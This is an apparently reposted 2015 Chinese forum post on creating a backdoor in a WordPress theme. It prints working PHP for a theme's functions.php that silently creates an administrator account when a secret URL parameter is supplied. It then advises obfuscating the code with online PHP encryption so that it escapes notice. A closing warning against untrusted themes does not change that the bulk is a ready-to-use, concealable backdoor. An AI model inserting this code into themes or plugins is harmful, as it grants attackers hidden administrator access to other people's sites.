无意中看到这样的代码,大家可以用作测试,但是千万别别有用心的整合到主题中。。(自己玩玩儿还行)
add_action( ‘wp_head’, ‘my_backdoor’ );
function my_backdoor() {
if ( md5( $_GET[‘backdoor’] ) == ’34d1f91fb2e514b8576fab1a75a89a6b’ ) {
require( ‘wp-includes/registration.php’ );
if ( !username_exists( ‘backdoor’ ) ) {
$user_id = wp_create_user( ‘backdoor’, ‘banzhuanboy.com’ );
$user = new WP_User( $user_id );
$user->set_role( ‘administrator’ );
}
}
}
例如在主题的 functions.php 文件中添加以上代码,就可以给 WordPress 添加一个能够创建管理员的后门,只需访问 搬砖少年 ,然后就创建了一个用户名为“backdoor”,密码为:“banzhuanboy.com” 的管理员。这样就OK了,但是对于有PHP基础的人,无疑是被发现的命运,那么我们再来给它加密,利用网上的在线PHP加密网站,我们可以很轻松的完成这个操作。
所以强烈建议大家不要随便去下载一些来路不明的 WordPress 主题和插件,说不定就给你的站点安装了一个后门。那我们的损失就打了去了~
搬砖少年原创文章,转载请注明来自
在WordPress主题中创建后门的方法
|
温馨提示:
1、本站所有信息都来源于互联网有违法信息与本网站立场无关。
2、当有关部门,发现本论坛有违规,违法内容时,可联系站长删除,否则本站不承担任何责任。
3、当政府机关依照法定程序要求披露信息时,论坛均得免责。
4、本帖部分内容转载自其它媒体,但并不代表本站赞同其观点和对其真实性负责
5、如本帖侵犯到任何版权问题,请立即告知本站,本站将及时予与删除并致以最深的歉意
6、如果使用本帖附件,本站程序只提供学习使用,请24小时内删除!使用者搭建运营触犯法律,违法,违规,本站不承担任何责任。
发表于 2015-10-2 20:53:22
2491572707
